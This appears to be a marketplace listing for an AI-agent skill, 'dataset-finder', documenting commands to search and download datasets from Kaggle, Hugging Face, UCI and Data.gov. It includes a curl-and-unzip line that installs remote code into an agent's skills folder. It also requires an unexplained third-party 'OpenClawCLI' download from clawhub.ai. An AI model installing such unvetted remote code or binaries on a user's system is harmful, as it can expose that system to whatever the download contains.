dataset-finder
Use this skill when users need to search for datasets, download data files, or explore data repositories. Triggers include: requests to "find datasets", "search for data", "download dataset from Kaggle", "get data from Hugging Face", "find ML datasets", or mentions of data repositories like Kaggle, UCI ML Repository, Data.gov, or Hugging Face. Also use for previewing dataset statistics, generating data cards, or discovering datasets for machine learning projects. Requires OpenClawCLI installation from clawhub.ai.
Install
mkdir -p .claude/skills/dataset-finder && curl -L -o skill.zip "https://mcp.directory/api/skills/download/5555" && unzip -o skill.zip -d .claude/skills/dataset-finder && rm skill.zip
Installs to .claude/skills/dataset-finder
About this skill
Dataset Finder
Search, download, and explore datasets from multiple repositories including Kaggle, Hugging Face, UCI ML Repository, and Data.gov. Preview statistics, generate data cards, and manage datasets for machine learning projects.
⚠️ Prerequisite: Install OpenClawCLI (available for Windows and macOS) from clawhub.ai.
Installation:
# Standard installation
pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4
# If you encounter permission errors, use a virtual environment
python -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4
Never use --break-system-packages as it can damage your system's Python installation.
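Several of the pip package names above differ from their import names (for example, beautifulsoup4 is imported as bs4 and huggingface-hub as huggingface_hub). A minimal sketch for checking that each package is visible in the active environment follows; the helper name missing_packages is hypothetical and not part of the skill.

```python
from importlib.util import find_spec

# pip name -> import name for the packages in the install command
REQUIRED = {
    "kaggle": "kaggle",
    "datasets": "datasets",
    "pandas": "pandas",
    "huggingface-hub": "huggingface_hub",
    "requests": "requests",
    "beautifulsoup4": "bs4",
}

def missing_packages(required=REQUIRED):
    """Return the pip names whose import name cannot be located."""
    # find_spec only locates a top-level module; it does not import it
    return [pip_name for pip_name, module in required.items()
            if find_spec(module) is None]

missing = missing_packages()
print("All dependencies found" if not missing else "Missing: " + ", ".join(missing))
```

Locating modules with find_spec avoids importing them, which matters for packages that run setup code at import time.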
Quick Reference
| Task | Command |
|---|---|
| Search Kaggle | python scripts/dataset.py kaggle search "housing prices" |
| Download Kaggle dataset | python scripts/dataset.py kaggle download "username/dataset-name" |
| Search Hugging Face | python scripts/dataset.py huggingface search "sentiment" |
| Download HF dataset | python scripts/dataset.py huggingface download "dataset-name" |
| Search UCI ML | python scripts/dataset.py uci search "classification" |
| Preview dataset | python scripts/dataset.py preview dataset.csv |
| Generate data card | python scripts/dataset.py datacard dataset.csv --output README.md |
| List local datasets | python scripts/dataset.py list |
Core Features
1. Multi-Repository Search
Search across multiple data repositories from a single interface.
Supported Sources:
- Kaggle - ML competitions and community datasets
- Hugging Face - NLP, vision, and audio datasets
- UCI ML Repository - Classic ML datasets
- Data.gov - US government open data
- Local - Manage downloaded datasets
2. Dataset Download
Download datasets with automatic format detection.
Supported formats:
- CSV, TSV
- JSON, JSONL
- Parquet
- Excel (XLSX, XLS)
- ZIP archives
- HDF5
- Feather
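The skill's actual detection logic is not shown here. As an illustration only, format detection could be sketched as a lookup on the file extension; the mapping, the labels, and the function name detect_format are assumptions.

```python
from pathlib import Path

# File extension -> format label, covering the formats listed above
EXTENSION_FORMATS = {
    ".csv": "csv", ".tsv": "tsv",
    ".json": "json", ".jsonl": "jsonl",
    ".parquet": "parquet",
    ".xlsx": "excel", ".xls": "excel",
    ".zip": "zip",
    ".h5": "hdf5", ".hdf5": "hdf5",
    ".feather": "feather",
}

def detect_format(path):
    """Guess a dataset's format from its file extension (case-insensitive)."""
    suffix = Path(path).suffix.lower()
    return EXTENSION_FORMATS.get(suffix, "unknown")

print(detect_format("train.CSV"))         # csv
print(detect_format("data/archive.zip"))  # zip
```

An extension lookup is cheap but can be fooled by misnamed files; a more careful implementation might also inspect the first bytes of the file.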
3. Dataset Preview
Get quick statistics and insights without loading entire datasets.
Preview features:
- Shape (rows × columns)
- Column names and types
- Missing value counts
- Basic statistics (mean, std, min, max)
- Memory usage
- Sample rows
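One way to gather some of these numbers without holding the whole file in memory is to stream it row by row. The sketch below uses only the standard library and covers shape, missing-value counts, and sample rows; it is an illustration under that assumption, not the skill's implementation, and preview_csv is a hypothetical name.

```python
import csv
import io

def preview_csv(stream, sample_size=5):
    """Stream a CSV once, collecting shape, missing counts, and sample rows."""
    reader = csv.DictReader(stream)
    columns = reader.fieldnames or []
    missing = {name: 0 for name in columns}
    sample, rows = [], 0
    for row in reader:
        rows += 1
        if len(sample) < sample_size:
            sample.append(row)
        for name in columns:
            value = row[name]
            # Short rows yield None; empty cells yield an empty string
            if value is None or value.strip() == "":
                missing[name] += 1
    return {"shape": (rows, len(columns)), "columns": columns,
            "missing": missing, "sample": sample}

demo = io.StringIO("id,name,age\n1,John Doe,35\n2,,28\n3,Bob Smith,\n")
summary = preview_csv(demo, sample_size=2)
print(summary["shape"])    # (3, 3)
print(summary["missing"])  # {'id': 0, 'name': 1, 'age': 1}
```

For a file on disk, pass `open(path, newline="")` as the stream. Only the sample rows are retained, so memory use stays roughly constant regardless of file size.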
4. Data Card Generation
Automatically generate dataset documentation.
Includes:
- Dataset description
- Schema information
- Statistics summary
- Usage examples
- License information
- Citation details
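To make the idea concrete, here is a minimal sketch that renders a few of these sections as Markdown. The function name render_data_card, its parameters, and the section layout are assumptions for illustration; the skill's own template may differ.

```python
def render_data_card(title, description, schema, license_name="Unknown"):
    """Render a minimal Markdown data card.

    schema is a list of (column, dtype, missing_count) tuples.
    """
    lines = [
        f"# Dataset Card: {title}",
        "## Dataset Description",
        description,
        "## Schema",
        "| Column | Type | Missing |",
        "|--------|------|---------|",
    ]
    lines += [f"| {col} | {dtype} | {missing} |" for col, dtype, missing in schema]
    lines += ["## License", license_name]
    return "\n".join(lines) + "\n"

card = render_data_card(
    "Housing Prices",
    "Housing prices and features for regression analysis.",
    [("Id", "int64", 0), ("SalePrice", "int64", 0)],
    license_name="Creative Commons",
)
print(card)
```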
Repository-Specific Commands
Kaggle
Search and download datasets from Kaggle.
Setup:
- Get Kaggle API credentials from https://www.kaggle.com/settings
- Place kaggle.json in ~/.kaggle/ (Linux/Mac) or %USERPROFILE%\.kaggle\ (Windows)
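Before running any Kaggle command, it can help to confirm that the token file is where it is expected. The sketch below assumes the token is a JSON object with "username" and "key" fields, as in the file Kaggle generates; load_kaggle_credentials is a hypothetical helper, not part of the skill.

```python
import json
from pathlib import Path

def load_kaggle_credentials(config_dir=None):
    """Return (username, key) from kaggle.json, or None if absent or incomplete."""
    # Path.home() resolves to the user profile directory on Windows as well
    config_dir = Path(config_dir) if config_dir else Path.home() / ".kaggle"
    token_file = config_dir / "kaggle.json"
    if not token_file.is_file():
        return None
    data = json.loads(token_file.read_text(encoding="utf-8"))
    if "username" in data and "key" in data:
        return data["username"], data["key"]
    return None

print("Kaggle credentials found" if load_kaggle_credentials() else "kaggle.json not found")
```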
# Search datasets
python scripts/dataset.py kaggle search "house prices"
# Search with filters
python scripts/dataset.py kaggle search "NLP" --file-type csv --sort-by hotness
# Download dataset
python scripts/dataset.py kaggle download "zillow/zecon"
# Download specific files
python scripts/dataset.py kaggle download "username/dataset" --file "train.csv"
# List dataset files
python scripts/dataset.py kaggle list "username/dataset-name"
Search options:
- --file-type - Filter by file type (csv, json, etc.)
- --license - Filter by license type
- --sort-by - Sort by hotness, votes, updated, or relevance
- --max-results - Limit number of results
Output:
1. House Prices - Advanced Regression Techniques
Owner: zillow/zecon
Size: 1.5 MB
Last updated: 2023-06-15
Downloads: 150,000+
URL: https://www.kaggle.com/datasets/zillow/zecon
2. Housing Prices Dataset
Owner: username/housing-data
Size: 850 KB
Last updated: 2023-08-20
Downloads: 50,000+
URL: https://www.kaggle.com/datasets/username/housing-data
Hugging Face Datasets
Search and download datasets from Hugging Face Hub.
# Search datasets
python scripts/dataset.py huggingface search "sentiment analysis"
# Search with filters
python scripts/dataset.py huggingface search "NLP" --task text-classification --language en
# Download dataset
python scripts/dataset.py huggingface download "imdb"
# Download specific split
python scripts/dataset.py huggingface download "imdb" --split train
# Download specific configuration
python scripts/dataset.py huggingface download "glue" --config mrpc
# Stream large datasets
python scripts/dataset.py huggingface download "large-dataset" --streaming
Search options:
- --task - Filter by task (text-classification, translation, etc.)
- --language - Filter by language code
- --multimodal - Include multimodal datasets
- --benchmark - Only benchmark datasets
- --max-results - Limit results
Output:
1. IMDB Movie Reviews
Dataset ID: imdb
Tasks: sentiment-classification
Languages: en
Size: 84.1 MB
Downloads: 1M+
URL: https://huggingface.co/datasets/imdb
2. Stanford Sentiment Treebank
Dataset ID: sst2
Tasks: sentiment-classification
Languages: en
Size: 7.4 MB
Downloads: 500K+
URL: https://huggingface.co/datasets/sst2
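The download options above correspond closely to arguments of load_dataset in the Hugging Face datasets library (a configuration name as the second positional argument, plus split and streaming keywords). How the script wires them together is not shown, so the following is only a sketch; build_load_args and download are hypothetical names.

```python
def build_load_args(name, config=None, split=None, streaming=False):
    """Translate CLI-style options into arguments for datasets.load_dataset."""
    args = (name, config) if config else (name,)
    kwargs = {}
    if split:
        kwargs["split"] = split
    if streaming:
        kwargs["streaming"] = True
    return args, kwargs

def download(name, **options):
    # Imported lazily so build_load_args works without the library installed
    from datasets import load_dataset
    args, kwargs = build_load_args(name, **options)
    return load_dataset(*args, **kwargs)

print(build_load_args("glue", config="mrpc"))
print(build_load_args("imdb", split="train"))
```

With streaming enabled, load_dataset returns an iterable dataset that fetches records on demand instead of downloading everything first, which suits datasets too large for local disk.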
UCI ML Repository
Search and download classic ML datasets.
# Search datasets
python scripts/dataset.py uci search "classification"
# Search by characteristics
python scripts/dataset.py uci search "regression" --min-samples 1000
# Download dataset
python scripts/dataset.py uci download "iris"
# Download with metadata
python scripts/dataset.py uci download "wine-quality" --include-metadata
Search options:
- --task-type - classification, regression, clustering
- --min-samples - Minimum number of instances
- --min-features - Minimum number of features
- --data-type - tabular, text, image, time-series
Output:
1. Iris Dataset
ID: iris
Task: classification
Samples: 150
Features: 4
Classes: 3
Missing values: No
URL: https://archive.ics.uci.edu/ml/datasets/iris
2. Wine Quality
ID: wine-quality
Task: classification/regression
Samples: 6497
Features: 11
Missing values: No
URL: https://archive.ics.uci.edu/ml/datasets/wine+quality
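The threshold-style search options can be pictured as a filter over dataset metadata. The sketch below applies them to the two entries from the sample output; the DatasetInfo record and filter_datasets function are hypothetical and say nothing about how the script queries the repository.

```python
from dataclasses import dataclass

@dataclass
class DatasetInfo:
    id: str
    task: str       # one or more task types separated by "/"
    samples: int
    features: int

def filter_datasets(catalog, task_type=None, min_samples=0, min_features=0):
    """Keep entries matching the task type and meeting the size thresholds."""
    return [
        d for d in catalog
        if (task_type is None or task_type in d.task.split("/"))
        and d.samples >= min_samples
        and d.features >= min_features
    ]

catalog = [
    DatasetInfo("iris", "classification", 150, 4),
    DatasetInfo("wine-quality", "classification/regression", 6497, 11),
]
matches = filter_datasets(catalog, task_type="regression", min_samples=1000)
print([d.id for d in matches])  # ['wine-quality']
```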
Data.gov
Search US government open data.
# Search datasets
python scripts/dataset.py datagov search "census"
# Search with organization filter
python scripts/dataset.py datagov search "health" --organization "cdc.gov"
# Search by topic
python scripts/dataset.py datagov search "education" --tags "schools,students"
# Download dataset
python scripts/dataset.py datagov download "dataset-id"
Search options:
- --organization - Filter by publishing organization
- --tags - Filter by tags (comma-separated)
- --format - Filter by format (csv, json, xml, etc.)
- --max-results - Limit results
Output:
1. 2020 Census Demographic Data
Organization: census.gov
Format: CSV
Size: 125 MB
Last updated: 2023-01-15
Tags: census, demographics, population
URL: https://catalog.data.gov/dataset/...
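Data.gov's catalog is built on CKAN, so a search like the ones above could plausibly be expressed as a package_search request. The sketch below only builds the request URL. The endpoint, the fq filter syntax, and the function name build_search_url are assumptions, and CKAN typically expects an organization's slug (such as cdc-gov) rather than a domain name.

```python
from urllib.parse import urlencode

# Assumed endpoint: the CKAN package_search action on catalog.data.gov
SEARCH_URL = "https://catalog.data.gov/api/3/action/package_search"

def build_search_url(query, organization=None, tags=None, max_results=10):
    """Build a CKAN package_search URL from CLI-style search options."""
    filters = []
    if organization:
        filters.append(f"organization:{organization}")
    for tag in tags or []:
        filters.append(f'tags:"{tag}"')
    params = {"q": query, "rows": max_results}
    if filters:
        # Filter queries are combined so that every condition must hold
        params["fq"] = " AND ".join(filters)
    return f"{SEARCH_URL}?{urlencode(params)}"

print(build_search_url("education", tags=["schools", "students"], max_results=5))
```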
Dataset Management
Preview Datasets
Get quick insights without loading entire datasets.
# Basic preview
python scripts/dataset.py preview data.csv
# Detailed statistics
python scripts/dataset.py preview data.csv --detailed
# Custom sample size
python scripts/dataset.py preview data.csv --sample 20
# Multiple files
python scripts/dataset.py preview train.csv test.csv
Output:
Dataset: train.csv
Shape: 1000 rows × 15 columns
Size: 2.5 MB
Memory usage: 120 KB
Columns:
- id (int64): no missing values
- name (object): 5 missing values
- age (int64): no missing values
- income (float64): 12 missing values
- category (object): no missing values
Numeric columns statistics:
age income
count 1000.0 988.0
mean 35.2 65432.1
std 12.5 25000.0
min 18.0 20000.0
max 75.0 150000.0
Categorical columns:
- category: 5 unique values
- name: 995 unique values
Sample (first 5 rows):
id name age income category
0 1 John Doe 35 65000.0 A
1 2 Jane Doe 28 55000.0 B
2 3 Bob Smith 42 85000.0 A
...
Generate Data Cards
Create standardized dataset documentation.
# Generate data card
python scripts/dataset.py datacard dataset.csv --output DATACARD.md
# Include statistics
python scripts/dataset.py datacard dataset.csv --include-stats --output README.md
# Custom template
python scripts/dataset.py datacard dataset.csv --template custom_template.md
# Multiple datasets
python scripts/dataset.py datacard train.csv test.csv --output-dir datacards/
Generated data card includes:
- Dataset description
- File information (size, format, rows, columns)
- Schema (column names, types, descriptions)
- Statistics (distributions, missing values, correlations)
- Sample data
- Usage examples
- License and citation
- Known issues/limitations
Example output (DATACARD.md):
# Dataset Card: Housing Prices
## Dataset Description
This dataset contains housing prices and features for regression analysis.
## Dataset Information
- **Format:** CSV
- **Size:** 1.2 MB
- **Rows:** 1,460
- **Columns:** 81
## Schema
| Column | Type | Description | Missing |
|--------|------|-------------|---------|
| Id | int64 | Unique identifier | 0 |
| MSSubClass | int64 | Building class | 0 |
| LotArea | int64 | Lot size in sq ft | 0 |
| SalePrice | int64 | Sale price | 0 |
...
## Statistics
- Numerical features: 38
- Categorical features: 43
- Missing values: 19 columns affected
- Target variable: SalePrice (range: $34,900 - $755,000)
## Usage
```python
import pandas as pd
df = pd.read_csv('housing_prices.csv')
```
## License
Creative Commons
List Local Datasets
Manage downloaded datasets.
# List all datasets
python scripts/dataset.py list
# List with details
python scripts/dataset.py list --detailed
# Filter by source
python scripts/dataset.py list --so
---
*Content truncated.*